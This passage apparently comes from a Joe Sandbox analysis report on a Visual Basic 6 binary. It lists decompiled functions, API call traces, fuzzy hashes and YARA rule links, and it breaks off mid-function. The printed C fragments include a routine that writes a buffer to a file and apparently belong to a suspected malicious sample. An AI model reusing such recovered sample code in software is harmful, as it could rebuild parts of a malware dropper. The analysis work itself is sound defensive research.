Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Move$Free$#638#644EraseListRedim
String ID:
API String ID: 2306505667-0
Opcode ID: e357bbc37bcbb5bc0531cefdb66b9342870e2d55711eb63c88960672e0cc6a69
Instruction ID: 59206c39a73485f288966e594569326bd33064dea6e66f86acb3ec878382cc2d
Opcode Fuzzy Hash: e357bbc37bcbb5bc0531cefdb66b9342870e2d55711eb63c88960672e0cc6a69
Instruction Fuzzy Hash: F05107B1E10219AFDB04DFA8DC98AADBBB5FF48710F05821AE505A7241DBB4A905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4D3C0 Relevance: 22.6, APIs: 15, Instructions: 142COMMON

Download Yara Rule

APIs

#648.MSVBVM60(?), ref: 0FA4D421
__vbaFreeVar.MSVBVM60 ref: 0FA4D42D
__vbaStrCmp.MSVBVM60(0FA35FF8,00000000), ref: 0FA4D444
#645.MSVBVM60(?,00000000), ref: 0FA4D461
__vbaStrMove.MSVBVM60 ref: 0FA4D46C
__vbaStrCmp.MSVBVM60(0FA35FF8,00000000), ref: 0FA4D478
__vbaFreeStr.MSVBVM60 ref: 0FA4D486
__vbaFreeStr.MSVBVM60(0FA4D59B), ref: 0FA4D594

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Free$#645#648Move
String ID:
API String ID: 2957232524-0
Opcode ID: bd8f3eb20679f8dc7bab7424aae68bfec6b63cac4d33478385bbbcbec107c751
Instruction ID: 8a29a6c4036831750f30d82e72c3028f275a2c4c6039e2bdd02687a75272058c
Opcode Fuzzy Hash: bd8f3eb20679f8dc7bab7424aae68bfec6b63cac4d33478385bbbcbec107c751
Instruction Fuzzy Hash: 605129B1D00209AFCB00DFA9D984AEDBBB9FF49715F10411DF519A7241DB746A06CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4D5D0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0FA3696C,0FA88818), ref: 0FA4D634
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA3695C,00000014), ref: 0FA4D65F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA3697C,00000058), ref: 0FA4D687
__vbaObjSet.MSVBVM60(?,00000000), ref: 0FA4D697
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA369D0,000000E0), ref: 0FA4D6BE
__vbaStrI2.MSVBVM60(?), ref: 0FA4D6C4
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D6CF
#690.MSVBVM60(?,Options,Show Tips at Startup,00000000), ref: 0FA4D6E4
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0FA4D6F4
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0FA4D704

Strings

Show Tips at Startup, xrefs: 0FA4D6D9
Options, xrefs: 0FA4D6DE

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$CheckHresult$FreeList$#690MoveNew2
String ID: Options$Show Tips at Startup
API String ID: 2513475975-2759323971
Opcode ID: 0f7bb058644e72b962bd2634c94a61999b837909a1a1d3bf25b0aba8530576eb
Instruction ID: 99daebf823f9c3f55e00a20143ba32ca79cd5c816492951f8bfedff226868c7e
Opcode Fuzzy Hash: 0f7bb058644e72b962bd2634c94a61999b837909a1a1d3bf25b0aba8530576eb
Instruction Fuzzy Hash: 93412A74E00209BFDB00DFA4CC89EEEBBB8FF49715F504129F505A7252D678A9468BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4DCC0 Relevance: 15.1, APIs: 10, Instructions: 107COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0FA3693C,0FA3136C), ref: 0FA4DD16
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA3692C,00000024), ref: 0FA4DD37
__vbaObjSet.MSVBVM60(?,00000000), ref: 0FA4DD56
__vbaNew2.MSVBVM60(0FA3693C,0FA3136C), ref: 0FA4DD6A
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA3692C,0000001C), ref: 0FA4DD9C
__vbaStrVarVal.MSVBVM60(?,?), ref: 0FA4DDAC
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0FA36B7C,00000054), ref: 0FA4DDC6
__vbaFreeStr.MSVBVM60 ref: 0FA4DDCF
__vbaFreeObj.MSVBVM60 ref: 0FA4DDD8
__vbaFreeVar.MSVBVM60 ref: 0FA4DDE1

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$CheckFreeHresult$New2
String ID:
API String ID: 4034668929-0
Opcode ID: 6aeff1930547d57f6eb1e5057995752d85ff11f3cb9d26808cfc919a23472c64
Instruction ID: d8db06cad2df8c0ea8bb20f4ffc0f4199b9dd765e6b4febe1373813a0546a688
Opcode Fuzzy Hash: 6aeff1930547d57f6eb1e5057995752d85ff11f3cb9d26808cfc919a23472c64
Instruction Fuzzy Hash: D4412770E00209ABCB109FA9DD88EAEBBFCFF59715B108119F501A3252D778A906CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4A850 Relevance: 13.6, APIs: 9, Instructions: 122COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000005,00000000,000572D2,80000284,0005735E), ref: 0FA4A8B0
__vbaVarMove.MSVBVM60 ref: 0FA4A8DA
__vbaVarZero.MSVBVM60 ref: 0FA4A90A
__vbaVarZero.MSVBVM60 ref: 0FA4A929
__vbaVarZero.MSVBVM60 ref: 0FA4A948
__vbaVarZero.MSVBVM60 ref: 0FA4A967
__vbaVarZero.MSVBVM60 ref: 0FA4A990
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4A9B8
__vbaVarMove.MSVBVM60 ref: 0FA4A9D7

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$Zero$Move$EraseRedim
String ID:
API String ID: 3302267972-0
Opcode ID: 5f50d92492c03e474f8fbf07544edcf5dd6db4e0ab562a00ae12d076992ff240
Instruction ID: a6ab578515ef495306a290b7057428fc43801f97a734e08ccf4cc8acd67c16c2
Opcode Fuzzy Hash: 5f50d92492c03e474f8fbf07544edcf5dd6db4e0ab562a00ae12d076992ff240
Instruction Fuzzy Hash: 0C5106B0D002589FDB18CF98D898A9DBFB4FF48320F15425EE50AA7355DB74A985CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4CC40 Relevance: 13.6, APIs: 9, Instructions: 117COMMON

Download Yara Rule

APIs

__vbaObjSetAddref.MSVBVM60(?,0FA85E9D,0005703E,0FA32FF6,00000000), ref: 0FA4CC8B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA4CCB6
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 0FA4CCE4
__vbaAryLock.MSVBVM60(?,?), ref: 0FA4CCF5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA4CD2A
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4CD34
__vbaVarMove.MSVBVM60 ref: 0FA4CD6F
__vbaFreeObj.MSVBVM60(0FA4CDB5), ref: 0FA4CDA2
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0FA4CDAE

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$CheckHresult$AddrefDestructFreeLockMoveRedimUnlock
String ID:
API String ID: 1456570928-0
Opcode ID: f4747cd6f439168d2543182eaf4b6f855092090f378fb7fb42f1387e5542bc38
Instruction ID: be5810e04a37bad38d1c7f37278c9325c6b821d88eec77d8f0f283a9e2e70db3
Opcode Fuzzy Hash: f4747cd6f439168d2543182eaf4b6f855092090f378fb7fb42f1387e5542bc38
Instruction Fuzzy Hash: BE411CB0E10208AFDB04DFE8D989EEEBBB9FB48711F108209F505A7241D774A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4A060 Relevance: 12.1, APIs: 8, Instructions: 102
fileCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0FA4A060(void* __ebx, void* __edi, void* __esi, WCHAR* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct _OVERLAPPED* _v28;
				struct _OVERLAPPED* _v32;
				char _v36;
				char _v40;
				void** _v48;
				struct _OVERLAPPED* _v56;
				long _v60;
				WCHAR* _t37;
				void* _t38;
				long _t49;
				intOrPtr _t70;
				void* _t74;
				void* _t76;
				intOrPtr _t77;

				_t77 = _t76 - 8;
				 *[fs:0x0] = _t77;
				_v12 = _t77 - 0x2c;
				_v8 = 0xfa311b0;
				_t37 = _a4;
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				_v40 = 0;
				_v56 = 0;
				_v60 = 0;
				__imp__#644( *_t37, __edi, __esi, __ebx,  *[fs:0x0], 0xfa32ff6, _t74);
				_v60 = _t37;
				_t38 = CreateFileW(_t37, 0xc0000000, 3, 0, 2, 0x80, 0);
				_v28 = _t38;
				if(_t38 != 0xffffffff) {
					_t70 =  *_a8;
					_t49 = E0FA32F6C(_t70);
					if(_t49 > 0) {
						_v60 = 0;
						__imp____vbaAryLock( &_v36, _t70);
						WriteFile(_v28,  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 0x14)), _t49,  &_v60, 0);
						__imp____vbaAryUnlock( &_v36);
					}
					__imp____vbaRedim(0x880, 0x10,  &_v40, 0, 1, 0, 0);
					_v56 = 0x4003;
					_v48 =  &_v28;
					__imp____vbaVarZero();
					_t38 = L0FA32CA7( *((intOrPtr*)( *((intOrPtr*)( *0xfa881f8 + 0xc)) + (0xc -  *((intOrPtr*)( *0xfa881f8 + 0x14))) * 4)),  *((intOrPtr*)( *((intOrPtr*)( *0xfa881f8 + 0xc)) + (0xc -  *((intOrPtr*)( *0xfa881f8 + 0x14))) * 4)),  &_v40);
					__imp____vbaErase(0,  &_v40);
					_v32 = 0xffffffff;
				}
				_push(0xfa4a1a3);
				return _t38;
			}

0x0fa4a063
0x0fa4a072
0x0fa4a07f
0x0fa4a082
0x0fa4a089
0x0fa4a08e
0x0fa4a091
0x0fa4a096
0x0fa4a09a
0x0fa4a09d
0x0fa4a0a0
0x0fa4a0a3
0x0fa4a0ba
0x0fa4a0bd
0x0fa4a0c6
0x0fa4a0c9
0x0fa4a0d2
0x0fa4a0da
0x0fa4a0de
0x0fa4a0e5
0x0fa4a0e8
0x0fa4a104
0x0fa4a10e
0x0fa4a10e
0x0fa4a124
0x0fa4a12d
0x0fa4a134
0x0fa4a14d
0x0fa4a16d
0x0fa4a177
0x0fa4a17d
0x0fa4a17d
0x0fa4a184
0x00000000

APIs

#644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4A0A3
CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 0FA4A0BD
__vbaAryLock.MSVBVM60(?), ref: 0FA4A0E8
WriteFile.KERNEL32(?,0FA32FF6,00000000,?,00000000), ref: 0FA4A104
__vbaAryUnlock.MSVBVM60(?), ref: 0FA4A10E
__vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000000,00000000), ref: 0FA4A124
__vbaVarZero.MSVBVM60 ref: 0FA4A14D
__vbaErase.MSVBVM60(00000000,?), ref: 0FA4A177

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$File$#644CreateEraseLockRedimUnlockWriteZero
String ID:
API String ID: 2317852514-0
Opcode ID: dcab442cdbefece82070a664a43a8316d9db71c516598b132d893f57d23c6dc0
Instruction ID: 471f0f5a3fc8abe71fab93f64dde77d6b06e8c0e38e749f71f610c7b62c0fa94
Opcode Fuzzy Hash: dcab442cdbefece82070a664a43a8316d9db71c516598b132d893f57d23c6dc0
Instruction Fuzzy Hash: A44138B4D00218AFCB10DFA8D989EDEBFB8FF49720F108109F505A7281C778A905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4D2B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

#593.MSVBVM60(?), ref: 0FA4D2F2
__vbaNew2.MSVBVM60(0FA3693C,00000000), ref: 0FA4D30E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA3692C,00000024), ref: 0FA4D32F
__vbaR8IntI4.MSVBVM60 ref: 0FA4D341
__vbaFreeVar.MSVBVM60 ref: 0FA4D34D
__vbaNew2.MSVBVM60(0FA33A6C,0FA882BC), ref: 0FA4D366
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA36850,000006FC), ref: 0FA4D38D

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$CheckHresultNew2$#593Free
String ID:
API String ID: 2147906589-0
Opcode ID: c4db88db28e1577e7216970ff8822ca4762c558f8b2756e8ab6f68892baf438d
Instruction ID: 7352a0274354b2b5882869ec4d5cdfaffdacf335410809111d90a897b6cce619
Opcode Fuzzy Hash: c4db88db28e1577e7216970ff8822ca4762c558f8b2756e8ab6f68892baf438d
Instruction Fuzzy Hash: DA214C74A01715FBCB109FA5EE49B9ABBB8FF49712F500018F445A3241D7B8A422CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4D070 Relevance: 10.5, APIs: 7, Instructions: 39COMMON

Download Yara Rule

APIs

__vbaVarDup.MSVBVM60(0005703E,00000000,00056ED2,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D0A7
__vbaI4Var.MSVBVM60(?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D0B1
#526.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D0BC
__vbaStrVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D0C6
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D0D3
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D0DC
__vbaFreeVar.MSVBVM60(0FA4D0FD,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D0F6

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$FreeMove$#526
String ID:
API String ID: 1133469359-0
Opcode ID: ce38383d2b4501d64015510bea6b8d09be39d8bfa1b7c3612cbcba9dd7aa434b
Instruction ID: 485770fc87d7096d9bc035fcb1c448531f4726878b023e99e67bcd0f909cb12b
Opcode Fuzzy Hash: ce38383d2b4501d64015510bea6b8d09be39d8bfa1b7c3612cbcba9dd7aa434b
Instruction Fuzzy Hash: 7601E575D10259EBCF00EFA4DE89EEEBBB8FB48716F004519F502A2204EB7865168B61

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4D110 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

__vbaObjSetAddref.MSVBVM60(?,0FA85FA0,0005703E,0FA32FF6,00056ED2,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6), ref: 0FA4D152
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6,0FA85FA0), ref: 0FA4D17D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA35C48,0000000C), ref: 0FA4D1F4
__vbaStrCopy.MSVBVM60 ref: 0FA4D203
__vbaFreeObj.MSVBVM60(0FA4D224,?,?,?,?,?,?,?,?,?,00000000,0FA32FF6,0FA85FA0), ref: 0FA4D21D

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$CheckHresult$AddrefCopyFree
String ID:
API String ID: 2020984855-0
Opcode ID: 243a82a2c0601e69e9a2e561de15b1c39165e897361a03c273ecdb7c1fcc2efc
Instruction ID: 03ad7d77f3757c41ea89d07d2e32001152b78d1112ad16f77ec6899c4a778f28
Opcode Fuzzy Hash: 243a82a2c0601e69e9a2e561de15b1c39165e897361a03c273ecdb7c1fcc2efc
Instruction Fuzzy Hash: A2311EB1D00209AFDB04DFA8D945DAEBBB8FF48701F108609F515B7241D778A906CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA4D7D0 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(0FA3696C,0FA88818,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D828
__vbaObjSetAddref.MSVBVM60(?,0FA31318,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D83E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0FA3695C,00000010,?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D85B
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,0FA32FF6), ref: 0FA4D864

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$AddrefCheckFreeHresultNew2
String ID:
API String ID: 1649212984-0
Opcode ID: 5d6331c7c23717b7745b16dedfa88229f136130459a9360f45d7492628a5f0a9
Instruction ID: 17530efaf3fcd1fedeeac0de51de3488306ec64785cb42dd4e13098e0f3c675d
Opcode Fuzzy Hash: 5d6331c7c23717b7745b16dedfa88229f136130459a9360f45d7492628a5f0a9
Instruction Fuzzy Hash: 04114F74D00209BBCB109F69CD85AAEBBB8FB49725F508129F541A3342CA78A9468BD0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA85B60 Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00004000,00000000,80000284,00056ED2,00057158), ref: 0FA85BAD
__vbaAryLock.MSVBVM60(00000000,?,80000284,00056ED2,00057158), ref: 0FA85BC2
#644.MSVBVM60(0FA31200), ref: 0FA85BDF
__vbaAryUnlock.MSVBVM60(00000000), ref: 0FA85BEB

Memory Dump Source

Source File: 00000006.00000002.1062298016.000000000FA31000.00000020.00000001.01000000.00000005.sdmp, Offset: 0FA30000, based on PE: true

Associated: 00000006.00000002.1062279192.000000000FA30000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA8B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA96000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB0C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB14000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.1062558199.000000000FB1B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fa30000_vbc.jbxd

Similarity

API ID: __vba$#644LockRedimUnlock
String ID:
API String ID: 3120749027-0
Opcode ID: b573923a50d42ce7d97751cb7a93275d4633db30f8bcabd5ae08be062ffc1850
Instruction ID: 43d0fe6f95dce93ae48fa2973a103b6c5b01265464018bb801beabb1aadcf95d
Opcode Fuzzy Hash: b573923a50d42ce7d97751cb7a93275d4633db30f8bcabd5ae08be062ffc1850
Instruction Fuzzy Hash: 421182B4E40704EFDB14DF54D989FAABBB4FB04B21F448148F9056B391D7B8A852CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0FA85AE0 Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0FA85AE0(void* __ebx, void* __edi, void* __ebp) {
				int _v4;
				intOrPtr _v8;
				intOrPtr _v24;
				intOrPtr _v36;
				char _v44;
				void* __esi;
				intOrPtr _t13;
				intOrPtr _t16;
				intOrPtr* _t27;
				void* _t29;
				void* _t30;
				void* _t32;

				_v4 = 0x16;
				_t30 = E0FA85B60(__ebx, __edi, _t29, _t32);
				if(_t30 == 0) {
					return _t30;
				} else {
					RtlFillMemory(_t30, 0x16, 0);
					_t27 = __imp__#644;
					_t13 =  *_t27(_v8, __edi);
					_t3 = _t30 + 8; // 0x8
					_v24 = _t13;
					E0FA32F5D(_t13, _t3);
					_t16 =  *_t27(_v24);
					_t6 = _t30 + 4; // 0x4
					_v36 = _t16;
